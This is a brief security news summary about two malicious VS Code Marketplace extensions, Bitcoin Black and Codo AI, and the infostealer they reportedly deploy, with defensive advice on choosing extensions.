Two malicious extensions on the Visual Studio Code Marketplace, Bitcoin Black and Codo AI, infect developer machines with malware capable of stealing credentials, screenshots, crypto wallets, and hijacking browser sessions. Developers should only install extensions from reputable sources to mitigate these security risks. #BitcoinBlack #CodoAI #VSCodeMarketplace
Keypoints
- Bitcoin Black and Codo AI extensions were published under the developer name βBigBlackβ.
- The extensions use PowerShell and batch scripts to download and deploy malicious payloads.
- Both extensions load a malicious DLL via DLL hijacking to deploy infostealer malware called runtime.exe.
- The malware steals system information, credentials, cookies, and cryptocurrency wallets, and hijacks browser sessions.
- Microsoft and developers should be vigilant by installing extensions only from trusted publishers.